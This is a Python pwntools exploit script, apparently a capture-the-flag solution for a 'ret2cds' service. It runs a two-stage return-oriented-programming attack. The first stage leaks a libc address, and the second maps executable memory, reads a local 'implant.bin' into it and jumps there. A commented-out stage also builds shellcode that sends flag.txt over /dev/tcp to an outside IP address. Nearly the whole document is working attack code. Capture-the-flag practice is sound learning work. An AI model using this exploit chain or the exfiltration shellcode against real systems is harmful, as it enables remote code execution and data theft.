
from pwn import *
import os
# pwntools global: target is 64-bit x86, so ROP()/p64()/u64() below use amd64 conventions.
context.arch = 'amd64'
def run():
    """Build and deliver the two-stage ROP payload to the ret2cds service.

    Stage 1 leaks a libc address by making the binary write its own GOT
    entry for ``write`` to stdout. Stage 2 uses the resolved libc base to
    mmap a fixed-address RWX region, read ``implant.bin`` into it and return
    into it, then hands the connection to the user interactively.

    Side effects: opens a TCP connection to the remote service, runs
    ``make`` through the shell to (re)build ``implant.bin``, and reads that
    file from the current directory. Propagates whatever pwntools raises on
    connection or recv failure; the socket is always closed in ``finally``.
    """
    elf = ELF("../challenge/chall/ret2cds")
    rop = ELF and ROP(elf)
    # Stage 1 chain: write(1, &GOT[write]) leaks the runtime address of libc's write.
    rop.write(1, elf.got['write'])
    print(rop.dump())
    libc = ELF("../challenge/chall/libc.so.6")
    print(hex(libc.symbols['write']))
    # Local-testing alternatives kept for reproduction; swap one in for the remote() line.
    # r = process(["./ld-2.31.so", "./ret2cds"], env={"LD_PRELOAD": os.getcwd() + "/libc.so.6"})
    # gdb.attach(r)
    # r = remote("localhost", 1337)
    r = remote("ret2cds.be.ax", 34485)
    try:
        # NOTE: recvuntil() is given a str rather than bytes; pwntools coerces it
        # but warns -- b"warden: " would be the clean form.
        r.recvuntil("warden: ")
        # 256 bytes of filler plus 8 more (presumably the saved rbp), then the
        # chain. The trailing 0x0040123a is an address inside the challenge
        # binary; presumably it re-enters the vulnerable read so the second
        # payload below is accepted -- confirm against the binary's disassembly.
        r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a))
        print(r.recvline())
        print(r.recvline())
        # The leaked GOT entry arrives on the next line. Bytes [1:8] are taken
        # and zero-extended to 8 bytes; the leading byte is skipped, presumably
        # a stray byte ahead of the pointer -- confirm against real output.
        leak = r.recvline()[1:8]
        leak = u64(leak.ljust(8, b'\x00'))
        print(hex(leak))
        # Rebase libc so every ROP() lookup below resolves to runtime addresses.
        libc_base = leak - libc.symbols['write']
        print(hex(libc_base))
        libc.address = libc_base
        # Stage 2 chain: mmap(0x133713370000, 0x10000, 7, 0x32) then
        # read(0, <that region>, 0x10000). On x86-64 Linux 7 is PROT_READ|WRITE|EXEC
        # and 0x32 is MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS. The fd (-1) and offset (0)
        # arguments are intentionally left off the ROP call; the r9 gadget below
        # is how the 6th argument register gets handled.
        libc_rop = ROP(libc)
        libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0)
        libc_rop.read(0, 0x133713370000, 0x10000)
        print(libc_rop.dump())
        print(libc_rop.chain())
        # abuse setcontext lol
        # setcontext is always a good function to look for cool gadgets in
        # Disassembly listing follows. Its addresses are 0x100000 above the libc
        # offset used in fucky_r9_gadget (0x1581e1 vs 0x581e1) -- presumably the
        # disassembler's default image base; confirm before reusing the offset.
        # loaded as 0x0
        # 001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30]
        # 001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88]
        # 88 00 00 00
        # 001581ec 31 c0 XOR EAX,EAX
        # 001581ee c3 RET
        fucky_r9_gadget = p64(0x581e1 + libc_base)
        # Load rdx with a pointer into rodata (convenient source of 0x0s), offset
        # so that r9 gets *(0x402008) -- presumably zero. r9 carries the 6th SysV
        # argument (mmap's offset), which the mmap ROP call above does not set.
        pre_rop = ROP(libc)
        pre_rop.rdx = 0x402008 - 0x30
        # Second payload: set rdx, run the r9 gadget, then the mmap+read chain,
        # and finally return into the start of the freshly mapped region.
        r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000))
        # (Re)build implant.bin, then zero-pad it to exactly the 0x10000 bytes the
        # remote read() expects so the read completes in one shot.
        # NOTE(review): assumes implant.bin is <= 0x10000 bytes; a negative pad
        # count silently yields b"".
        os.system("make")
        with open("implant.bin", "rb") as f:
            shellcode = f.read()
        shellcode += b"\x00" * (0x10000 - len(shellcode))
        r.send(shellcode)
        # stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))
        r.interactive()
    finally:
        r.close()
# Script entry point: only runs the exploit when executed directly, not on import.
if __name__ == "__main__":
    run()